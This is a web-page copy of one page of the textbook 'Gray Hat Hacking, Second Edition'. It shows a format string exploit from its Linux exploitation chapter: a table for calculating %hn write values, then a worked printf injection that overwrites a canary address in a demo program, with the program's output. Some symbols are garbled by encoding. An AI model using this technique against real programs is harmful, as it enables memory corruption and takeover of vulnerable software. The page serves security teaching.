Gray Hat Hacking, Second Edition

Prev | Current Page 343 | Next

Shon Harris, Allen Harper, Chris Eagle, and Jonathan Ness

"Gray Hat Hacking, Second Edition"

49143x
%[offset]$hn %[offset+1]$hn %4\$hn
%.[LOB ??“ HOB]x %.[HOB ??“ LOB]x ???.??? Used to ensure integers.
Expressed in decimal.
0xff50??“0xbfff=
16209 in decimal:
%.16209x
%[offset+1]$hn %[offset]$hn %5\$hn
Table 8-2 The Magic Formula to Calculate your Exploit Format String
Chapter 8: Advanced Linux Exploits
177
PART III
To construct the injection buffer to overwrite the canary address 0x08049440 with
0xbfffff50, follow the formula in Table 8-2. Values are calculated for you in the right column
and used here:
$ ./fmtstr `printf
"\x42\x94\x04\x08\x40\x94\x04\x08"`%.49143x%4\$hn%.16209x%5\$hn
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000

000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000648
Canary at 0x08049440 = 0xbfffff50
CAUTION Once again, your values will be different.

Pages:
331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355

The Art of Agile Development (page 5) Absalom's Hair (page 48) Absolute Surrender and Other Addresses (page 9)

Beta Book

Shon Harris, Allen Harper, Chris Eagle, and Jonathan Ness

"Gray Hat Hacking, Second Edition"